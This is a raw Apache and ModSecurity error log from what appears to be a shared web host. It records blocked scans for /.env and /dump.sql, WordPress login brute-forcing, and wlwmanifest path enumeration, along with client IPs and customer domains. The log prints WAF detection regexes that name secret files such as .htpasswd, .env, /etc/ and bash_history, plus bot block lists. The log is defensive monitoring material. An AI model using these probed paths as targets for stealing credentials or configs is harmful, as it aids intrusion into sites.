[Tue May 26 17:59:29.380619 2026] [security2:error] [pid 946381:tid 946629] [client 172.224.240.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWSKdiTu5WG4Dm5WpoMuQAAAHY"]
[Tue May 26 17:59:29.516333 2026] [security2:error] [pid 946381:tid 946577] [client 107.189.14.4:55494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "stvica.com"] [uri "/dump.sql"] [unique_id "ahWSKdiTu5WG4Dm5WpoMxQAAAEI"], referer: stvica.com/dump.sql
[Tue May 26 17:59:30.269739 2026] [security2:error] [pid 946381:tid 946534] [client 49.43.202.168:60679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.202.43.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "politica-global.com"] [uri "/xmlrpc.php"] [unique_id "ahWSKtiTu5WG4Dm5WpoMzwAAABc"]
[Tue May 26 17:59:30.269855 2026] [security2:error] [pid 946381:tid 946534] [client 49.43.202.168:60679] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "politica-global.com"] [uri "/xmlrpc.php"] [unique_id "ahWSKtiTu5WG4Dm5WpoMzwAAABc"]
[Tue May 26 17:59:31.031859 2026] [security2:error] [pid 946381:tid 946611] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSKtiTu5WG4Dm5WpoM2wAAAGQ"]
[Tue May 26 17:59:31.782332 2026] [security2:error] [pid 946381:tid 946415] [remote 45.79.189.31:50316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWSK9iTu5WG4Dm5WpoM8QAAOSE"]
[Tue May 26 17:59:32.058778 2026] [security2:error] [pid 946381:tid 946548] [client 78.47.173.76:44360] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWSK9iTu5WG4Dm5WpoM8AAAACU"], referer: https://thegoodsporting.com
[Tue May 26 17:59:32.484422 2026] [core:crit] [pid 946381:tid 946570] (13)Permission denied: [client 157.55.39.200:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:59:32.927272 2026] [security2:error] [pid 946381:tid 946417] [remote 50.6.192.190:46862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSLNiTu5WG4Dm5WpoNEQAANyM"]
[Tue May 26 17:59:33.103929 2026] [security2:error] [pid 946381:tid 946604] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSLNiTu5WG4Dm5WpoNDwAAAF0"]
[Tue May 26 17:59:33.230777 2026] [security2:error] [pid 946381:tid 946429] [remote 50.6.192.190:46862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSLdiTu5WG4Dm5WpoNGwAAUC8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 17:59:34.924257 2026] [security2:error] [pid 946381:tid 946573] [client 139.59.228.172:63895] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWSLtiTu5WG4Dm5WpoNSgAAAD4"]
[Tue May 26 17:59:35.411252 2026] [core:crit] [pid 946381:tid 946624] (13)Permission denied: [client 40.77.167.37:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:59:35.518298 2026] [core:crit] [pid 946381:tid 946547] (13)Permission denied: [client 52.167.144.174:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:59:35.678891 2026] [security2:error] [pid 946381:tid 946551] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSL9iTu5WG4Dm5WpoNVwAAACg"]
[Tue May 26 17:59:35.761929 2026] [security2:error] [pid 946381:tid 946584] [client 139.59.228.172:64630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.228.59.139.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jkjuice.com"] [uri "/xmlrpc.php"] [unique_id "ahWSL9iTu5WG4Dm5WpoNZQAAAEk"]
[Tue May 26 17:59:37.612653 2026] [security2:error] [pid 946381:tid 946519] [client 139.59.228.172:65412] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWSMdiTu5WG4Dm5WpoNogAAAAg"]
[Tue May 26 17:59:38.463379 2026] [security2:error] [pid 946381:tid 946452] [remote 113.190.40.93:36320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSMtiTu5WG4Dm5WpoNsgAAOUY"]
[Tue May 26 17:59:38.876091 2026] [security2:error] [pid 946381:tid 946570] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSMtiTu5WG4Dm5WpoNtQAAADs"]
[Tue May 26 17:59:39.114801 2026] [security2:error] [pid 946381:tid 946514] [client 130.51.23.23:54259] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWSMtiTu5WG4Dm5WpoNvAAAAAM"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 17:59:39.470339 2026] [security2:error] [pid 946381:tid 946573] [client 139.59.228.172:49611] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWSM9iTu5WG4Dm5WpoNzgAAAD4"]
[Tue May 26 17:59:40.607054 2026] [security2:error] [pid 946381:tid 946583] [client 14.170.14.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSNNiTu5WG4Dm5WpoN4QAAAEg"]
[Tue May 26 17:59:41.131276 2026] [security2:error] [pid 946381:tid 946613] [client 139.59.228.172:49860] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWSNdiTu5WG4Dm5WpoOGAAAAGY"]
[Tue May 26 17:59:41.481396 2026] [security2:error] [pid 946381:tid 946570] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSNdiTu5WG4Dm5WpoOFwAAADs"]
[Tue May 26 17:59:41.771467 2026] [security2:error] [pid 946381:tid 946637] [client 139.59.228.172:50636] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWSNdiTu5WG4Dm5WpoOLQAAAH4"]
[Tue May 26 17:59:42.405113 2026] [security2:error] [pid 946381:tid 946586] [client 139.59.228.172:50992] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWSNtiTu5WG4Dm5WpoOPQAAAEs"]
[Tue May 26 17:59:43.038913 2026] [security2:error] [pid 946381:tid 946594] [client 139.59.228.172:51382] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWSN9iTu5WG4Dm5WpoOSwAAAFM"]
[Tue May 26 17:59:43.066032 2026] [security2:error] [pid 946381:tid 946595] [client 185.191.171.18:59058] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/day/2024-03-10/"] [unique_id "ahWSN9iTu5WG4Dm5WpoOTQAAAFQ"]
[Tue May 26 17:59:43.066145 2026] [security2:error] [pid 946381:tid 946595] [client 185.191.171.18:59058] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/day/2024-03-10/"] [unique_id "ahWSN9iTu5WG4Dm5WpoOTQAAAFQ"]
[Tue May 26 17:59:43.237439 2026] [security2:error] [pid 946381:tid 946476] [remote 109.205.180.55:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWSN9iTu5WG4Dm5WpoOTAAASl4"]
[Tue May 26 17:59:43.658356 2026] [security2:error] [pid 946381:tid 946635] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSN9iTu5WG4Dm5WpoOUAAAAHw"]
[Tue May 26 17:59:43.688772 2026] [security2:error] [pid 946381:tid 946527] [client 139.59.228.172:51748] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWSN9iTu5WG4Dm5WpoOYAAAABA"]
[Tue May 26 17:59:44.315047 2026] [security2:error] [pid 946381:tid 946624] [client 139.59.228.172:52080] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWSONiTu5WG4Dm5WpoObQAAAHE"]
[Tue May 26 17:59:44.350908 2026] [security2:error] [pid 946381:tid 946523] [client 142.44.220.186:64810] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "moes-art.com"] [uri "/robots.txt"] [unique_id "ahWSONiTu5WG4Dm5WpoObgAAAAw"]
[Tue May 26 17:59:44.351025 2026] [security2:error] [pid 946381:tid 946523] [client 142.44.220.186:64810] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "moes-art.com"] [uri "/robots.txt"] [unique_id "ahWSONiTu5WG4Dm5WpoObgAAAAw"]
[Tue May 26 17:59:44.749404 2026] [security2:error] [pid 946381:tid 946572] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "atreegroup.com"] [uri "/index.php"] [unique_id "ahWSN9iTu5WG4Dm5WpoOSQAAAD0"]
[Tue May 26 17:59:44.941464 2026] [security2:error] [pid 946381:tid 946563] [client 139.59.228.172:52293] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWSONiTu5WG4Dm5WpoOfwAAADQ"]
[Tue May 26 17:59:45.589273 2026] [security2:error] [pid 946381:tid 946635] [client 139.59.228.172:50704] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWSOdiTu5WG4Dm5WpoOkgAAAHw"]
[Tue May 26 17:59:45.723856 2026] [security2:error] [pid 946381:tid 946578] [client 142.44.220.244:58074] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "moes-art.com"] [uri "/"] [unique_id "ahWSOdiTu5WG4Dm5WpoOmQAAAEM"]
[Tue May 26 17:59:45.723978 2026] [security2:error] [pid 946381:tid 946578] [client 142.44.220.244:58074] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "moes-art.com"] [uri "/"] [unique_id "ahWSOdiTu5WG4Dm5WpoOmQAAAEM"]
[Tue May 26 17:59:46.027269 2026] [security2:error] [pid 946381:tid 946582] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSOdiTu5WG4Dm5WpoOlwAAAEc"]
[Tue May 26 17:59:46.230185 2026] [security2:error] [pid 946381:tid 946637] [client 139.59.228.172:50971] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWSOtiTu5WG4Dm5WpoOpQAAAH4"]
[Tue May 26 17:59:46.891185 2026] [security2:error] [pid 946381:tid 946562] [client 139.59.228.172:51283] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWSOtiTu5WG4Dm5WpoOswAAADM"]
[Tue May 26 17:59:47.055080 2026] [security2:error] [pid 946381:tid 946480] [remote 91.227.122.219:37496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWSOtiTu5WG4Dm5WpoOsAAAJGI"]
[Tue May 26 17:59:47.372902 2026] [security2:error] [pid 946381:tid 946561] [client 173.252.87.29:39596] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahWSOdiTu5WG4Dm5WpoOnQAAMgs"]
[Tue May 26 17:59:47.888597 2026] [security2:error] [pid 946381:tid 946535] [client 78.47.98.55:1892] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWSO9iTu5WG4Dm5WpoOzAAAABg"], referer: http://ucdc.co.in/
[Tue May 26 17:59:48.542123 2026] [security2:error] [pid 946381:tid 946587] [client 139.59.228.172:51621] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWSPNiTu5WG4Dm5WpoO3AAAAEw"]
[Tue May 26 17:59:49.165940 2026] [security2:error] [pid 946381:tid 946517] [client 139.59.228.172:52582] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWSPdiTu5WG4Dm5WpoO6QAAAAY"]
[Tue May 26 17:59:49.356056 2026] [security2:error] [pid 946381:tid 946634] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWSPdiTu5WG4Dm5WpoO9QAAAHs"]
[Tue May 26 17:59:49.356450 2026] [security2:error] [pid 946381:tid 946555] [client 66.249.64.110:37671] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWSPdiTu5WG4Dm5WpoO6gAAACw"]
[Tue May 26 17:59:49.426947 2026] [security2:error] [pid 946381:tid 946581] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSPNiTu5WG4Dm5WpoO6AAAAEY"]
[Tue May 26 17:59:49.783207 2026] [security2:error] [pid 946381:tid 946595] [client 139.59.228.172:52770] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jkjuice.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWSPdiTu5WG4Dm5WpoPBQAAAFQ"]
[Tue May 26 17:59:50.142357 2026] [core:crit] [pid 946381:tid 946533] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:59:51.369758 2026] [security2:error] [pid 946381:tid 946624] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSPtiTu5WG4Dm5WpoPJwAAAHE"]
[Tue May 26 17:59:54.470104 2026] [security2:error] [pid 946381:tid 946602] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSQtiTu5WG4Dm5WpoPcgAAAFs"]
[Tue May 26 17:59:54.824135 2026] [security2:error] [pid 946381:tid 946611] [client 208.91.198.85:51496] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "freshmindsolutions.com"] [uri "/wp-content/uploads/2023/03/logo-fms-1.jpg"] [unique_id "ahWSQtiTu5WG4Dm5WpoPfgAAAGQ"]
[Tue May 26 17:59:55.799899 2026] [security2:error] [pid 946381:tid 946598] [client 66.249.66.201:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.panda-eco.com"] [uri "/index.php"] [unique_id "ahWSQ9iTu5WG4Dm5WpoPoAAAAFc"]
[Tue May 26 17:59:56.115529 2026] [security2:error] [pid 946381:tid 946570] [client 77.83.39.197:36774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/.env"] [unique_id "ahWSRNiTu5WG4Dm5WpoPqAAAADs"]
[Tue May 26 17:59:56.762922 2026] [security2:error] [pid 946381:tid 946624] [client 193.37.33.111:30493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWSRNiTu5WG4Dm5WpoPsgAAAHE"]
[Tue May 26 17:59:56.846559 2026] [core:crit] [pid 946381:tid 946636] (13)Permission denied: [client 52.167.144.174:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:59:57.015868 2026] [security2:error] [pid 946381:tid 946533] [client 34.41.98.139:51022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWSRdiTu5WG4Dm5WpoPxQAAABY"]
[Tue May 26 17:59:57.034873 2026] [security2:error] [pid 946381:tid 946611] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWSRNiTu5WG4Dm5WpoPugAAAGQ"]
[Tue May 26 17:59:57.551868 2026] [security2:error] [pid 946381:tid 946575] [client 34.41.98.139:51134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.98.41.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWSRdiTu5WG4Dm5WpoPzAAAAEA"]
